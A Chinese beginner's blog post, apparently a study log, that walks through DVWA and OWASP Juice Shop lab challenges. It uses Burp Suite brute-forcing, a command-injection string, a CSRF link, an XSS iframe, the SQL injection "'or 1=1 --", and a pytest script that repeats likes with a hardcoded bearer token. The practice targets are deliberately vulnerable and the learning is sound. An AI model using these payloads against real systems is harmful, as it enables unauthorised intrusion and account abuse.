安全测试初学体验

 安全专题:暴力破解 ,命令 注入 ,sql注入

安全测试专题:xss(cross-site script) <script>alert(`xss`)</script> DOM,反射型,持久型\

目录

目录

 安全专题:暴力破解 ,命令 注入 ,sql注入

安全测试专题:xss(cross-site script) DOM,反射型,持久型\

一 安装软件使用

1,下载Burp Suite (使用原因:方便抓包 自带浏览器)

 2 ,安装到自己适合的路径下

3,打开Burp Suite 

二 打开网站 进行设置等级 

2.尝试密码

 3对图像进行查找

4 对刚下载的软件有初步的了解

 步骤四 :下面是暴力破解的步骤1:找到要 暴力破解的请求,右键 intruder暴力破解2:

安全测试闯关

第一关

 第二关

​编辑

 第三关

第四关   !!对JavaScript进行安全渗透

 1、让我们提交一 下success就行了。

​编辑2、我们提交 后invalid token ,token不对。检查源码,F12 --元素。hidden --token

3、使用前端修改属性技术,把这token弄出来,在页面上看到输入框中有token

另一种方法直接修改

 第五关 &&&& 安全测试二

 1、建立一个js文件

2、通过file upload上 传到 服务器上,记住上传路径 在哪 。

第六关***进行威胁渗透 编写txt文件

将级别 更新为中级

 2、代码,查看网页信息,F12,function 方法名!!!do_elsesomething(e)

 3、调试+交互,success ,控制台,do_elsesomething(),提交。

高级:javasript attack攻击

3、解决 后的函数

第二安全测试 

靶场Juice-shop学习

一星 ⭐️⭐️

​编辑

 二星 ⭐️⭐️

Login Admin

安全测试:为同一用户点赞至少3次

网站



burp suite 安全渗透测试主 要工具

一 安装软件使用

1,下载Burp Suite (使用原因:方便抓包 自带浏览器)

 2 ,安装到自己适合的路径下

3,打开Burp Suite 

二 打开网站 进行设置等级 

测试环境:Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development* 登陆admin/password1进入 后在

设置低级别

2.尝试密码

 admin/password1对密码进行修改 无线次数

 3对图像进行查找

 这里应该所有用户,admin gordonb,pablo,smithy,1337

 burp suite方式进行暴力破解

4 对刚下载的软件有初步的了解

步骤:关闭拦截(中断),打开浏览器  浏览器是自带模仿谷歌浏览器

步骤 二:登陆,设置低级别 ,进入Brute Force,输入用户名密码,尝试破解

 步骤四 :下面是暴力破解的步骤1:找到要 暴力破解的请求,右键 intruder暴力破解2:

暴力破解2: 

 

1:Target 用于配置目标服务器进行攻击的详细信息。


2:Positions  设置Payloads的插入点以及攻击类型(攻击模式)。


3:Payloads  设置payload,配置字典


4:Opetions   此选项卡包含了request headers,request engine,attack results ,grep match,grep_extrack,grep payloads和redirections。你可以发动攻击之前,在主要Intruder的UI上编辑这些选项,大部分设置也可以在攻击时对已在运行的窗口进行修改。

暴力 破解3 payload

 

转存失败重新上传取消

 暴力破解4:

 总结

1、使用burpsuite进行抓包
步骤一:关闭拦截(中断),打开浏览器。
步骤 二:在浏览器进行各种你要抓包一 些操作
步骤三 :进入proxy--http history中看 到 已经抓到包

2、暴力破解 -intruder步骤1:找到要 暴力破解的请求,右键 intruder

 步骤 2:clear变量,选择要进行暴力破解的变化地方 点击add为变量

 步骤3:进入payload页,选择 simple list把准备 的 数据加入

步骤 4 ,点击attact,查看状态码或长度,排序找到不同 请求,查看是 否正确破解

安全测试闯关

第一关

测试靶场:Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*

***********************************密码就上一步有教程***********************************

设置级别为低:

  • 1、抓包(请求响应,http协议 内容 )

  • 2、中断请求响应,并修改它发送。

  • 3、重发 请求

 

导入密码 

 

通过 

 第二关

27.0.0.1 网络,本机。如果你 要 证明你的电脑网卡和网卡的 驱动没问题。

ping 127.0.0.1
ping 192.168.1.1 (网关或网中任何 一 台 电脑的 IP) 证明局域网没问题。
ping www.baidu.com (互联网) 证明公网,互联网没问题。
ping 服务器114.116.97.187 证明服务器没问题。

 127.0.0.1 & find / -name DVWA (find /(从根下查) -name(通过文件名) dvwa文件夹名字)

 第三关

对密码进行修改

 新建一个HTML文件写入超链接,加上你刚修改完成的提交的URL。

第四关   !!对JavaScript进行安全渗透

 1、让我们提交一 下success就行了。


2、我们提交 后invalid token ,token不对。检查源码,F12 --元素。hidden --token


3、使用前端修改属性技术,把这token弄出来,在页面上看到输入框中有token

另一种方法直接修改

 第五关 &&&& 安全测试二

 1、建立一个js文件

 保存为*.js

2、通过file upload上 传到 服务器上,记住上传路径 在哪 。

回到进行查看

第六关***进行威胁渗透 编写txt文件

<?php echo "****************!"; ?>

同理 进行查看、

将级别 更新为中级

 function do_something(e){for(var t="",n=e.length-1;n>=0;n--)t+=e[n];return t}
setTimeout(function(){do_elsesomething("XX")},300);
function do_elsesomething(e){document.getElementById("token").value=do_something(e+document.getElementById("phrase").value+"XX")}

 2、代码,查看网页信息,F12,function 方法名!!!do_elsesomething(e)

 3、调试+交互,success ,控制台,do_elsesomething(),提交。

 

 重点找到生成token的函数!!!

高级:javasript attack攻击

1、查看源代码(右下角)view source,发现是加密或混淆 。2、按它提示的地方右下角view help (Deobfuscate Javascript - Deobfuscate malicious Javascripts for quick and easy analysis

3、解决 后的函数

 token_part_1 2,3

function do_something(e) {
    for (var t = "", n = e.length - 1; n >= 0; n--) t += e[n];
    return t
}
function token_part_3(t, y = "ZZ") {
    document.getElementById("token").value = sha256(document.getElementById("token").value + y)
}
function token_part_2(e = "YY") {
    document.getElementById("token").value = sha256(e + document.getElementById("token").value)
}
function token_part_1(a, b) {
    document.getElementById("token").value = do_something(document.getElementById("phrase").value)
}
document.getElementById("phrase").value = "";
setTimeout(function() {
    token_part_2("XX")
}, 300);
document.getElementById("send").addEventListener("click", token_part_3);
token_part_1("ABCD", 44);

1、先在页面输入success,

2、在控制台输入 token_part_1("ABCD", 44);

3、输入token_part_2("XX",e="YY");

4、提交页面success。

5、显示成功!!!

 

 

高级确实有很大的麻烦!!对本人也是极大得麻烦;

******************************************************************************************************************************************************************************************************************************************************************************************************************************************

第二安全测试 

靶场Juice-shop学习

一星 ⭐️⭐️

 搜索score得到如下

在URL后添加score-board请求,通过

在第一次出现URL http://localhost:3000/rest/admin/application-configuration 也会出现

image-20210219094743331

 暴露出页面URL

<iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&color=%23ff5500&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true"></iframe>

即可通过

 

 burp拦截修改评分rating值为0,即可通过

 

 二星 ⭐️⭐️

Login Admin

注入 万能密码

使用万能密码即可登录管理员账户,即可通过

'or 1=1 --

 

这是自动化也有介绍  闯关内容  !!   (96条消息) python自动化测试_W&L.的博客-优快云博客

安全测试:为同一用户点赞至少3次

网站

对网站进行注册

 复制网址和url

import requests


def test_01():
    # 登陆:http://114.116.97.187:8002/rest/user/login
    url="http://114.116.97.187:8002/rest/user/login"
    payload={"email":"L728@qq.com","password":"123456"}
    res=requests.post(url=url,json=payload)
    print(res.json())

 找到刚刚评论的文字

 复制Authorization:

复制Cookie:

   hearder={
        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36',
        'Authorization':'Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjQsInVzZXJuYW1lIjoiIiwiZW1haWwiOiJ3eG1AcXEuY29tIiwicGFzc3dvcmQiOiJlMTBhZGMzOTQ5YmE1OWFiYmU1NmUwNTdmMjBmODgzZSIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIwLjAuMC4wIiwicHJvZmlsZUltYWdlIjoiL2Fzc2V0cy9wdWJsaWMvaW1hZ2VzL3VwbG9hZHMvZGVmYXVsdC5zdmciLCJ0b3RwU2VjcmV0IjoiIiwiaXNBY3RpdmUiOnRydWUsImNyZWF0ZWRBdCI6IjIwMjItMDctMjggMDc6NDM6MTUuMTUxICswMDowMCIsInVwZGF0ZWRBdCI6IjIwMjItMDctMjggMDc6NDM6MTUuMTUxICswMDowMCIsImRlbGV0ZWRBdCI6bnVsbH0sImlhdCI6MTY1ODk5NDIwOCwiZXhwIjoxNjU5MDEyMjA4fQ.NkDjAUmbv02K2n5znaxGqUrpOIFnkYEiRHkrjoB43M9s-3QaMitXux1OPZuzTJBbFPWyRaLpMc_yM8vIMrSf-dQaXhCs-7YEUNoDp6dvHVyRaGBg6oR8zSGNsl2fKHlEpg1yKPwFwgBh8nr3QnMLgziQUmKuFQwG-53O1RPBJ58',

    }

记得加,  很重要 !!!!!!!!!!!!!!!!!!! 

点赞 观察

 

 把下面代码从jsp转换 

 

from random import randint

import pytest
import requests
@pytest.fixture()
def login():
    # 登陆:http://114.116.97.187:8002/rest/user/login
    url="http://114.116.97.187:8002/rest/user/login"
    payload={"email":"wxm@qq.com","密码":"密码"}
    requests.post(url=url,json=payload)
    # print(res.json())# def test_review():
    review_url="http://114.116.97.187:8002/rest/products/33/reviews"
    review_data={"message":"喜欢骑行"+str(randint(1,100)), "author": "wxm@qq.com"}
    # res=requests.put(review_url,review_data)
    # print(res.json())
    requests.put(review_url,review_data)
    res_get=requests.get(review_url)
    rid=res_get.json()['data'][-1]['_id']

    return rid

# @pytest.mark,paramentrize
@pytest.mark.parametrize("value",[1,2,3])
def test_tree(login,value):
    rid=login
    print(rid)
    #{"id":"s95gmSiczgBo5BuPX"}
    url="http://114.116.97.187:8002/rest/products/reviews"
    data = {"id":rid}
    hearder={
        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36',
        'Authorization':'Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjQsInVzZXJuYW1lIjoiIiwiZW1haWwiOiJ3eG1AcXEuY29tIiwicGFzc3dvcmQiOiJlMTBhZGMzOTQ5YmE1OWFiYmU1NmUwNTdmMjBmODgzZSIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIwLjAuMC4wIiwicHJvZmlsZUltYWdlIjoiL2Fzc2V0cy9wdWJsaWMvaW1hZ2VzL3VwbG9hZHMvZGVmYXVsdC5zdmciLCJ0b3RwU2VjcmV0IjoiIiwiaXNBY3RpdmUiOnRydWUsImNyZWF0ZWRBdCI6IjIwMjItMDctMjggMDc6NDM6MTUuMTUxICswMDowMCIsInVwZGF0ZWRBdCI6IjIwMjItMDctMjggMDc6NDM6MTUuMTUxICswMDowMCIsImRlbGV0ZWRBdCI6bnVsbH0sImlhdCI6MTY1ODk5NDIwOCwiZXhwIjoxNjU5MDEyMjA4fQ.NkDjAUmbv02K2n5znaxGqUrpOIFnkYEiRHkrjoB43M9s-3QaMitXux1OPZuzTJBbFPWyRaLpMc_yM8vIMrSf-dQaXhCs-7YEUNoDp6dvHVyRaGBg6oR8zSGNsl2fKHlEpg1yKPwFwgBh8nr3QnMLgziQUmKuFQwG-53O1RPBJ58',

    }
    # requests.post(url=url,data=data,headers=hearder)
    # requests.post(url=url,)
    # requests.post(url=url,data=data,hearder=hearder)
    # requests.post(url=url,data=data,hearder=hearder)
    # requests.post(url=url,data=data,hearder=hearder)


    requests.post(url=url,data=data,headers=hearder)

 先还到自己的测试目录下  cd + **

在执行并发    pytest -n 3 ******.py

刷新进行查看 

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值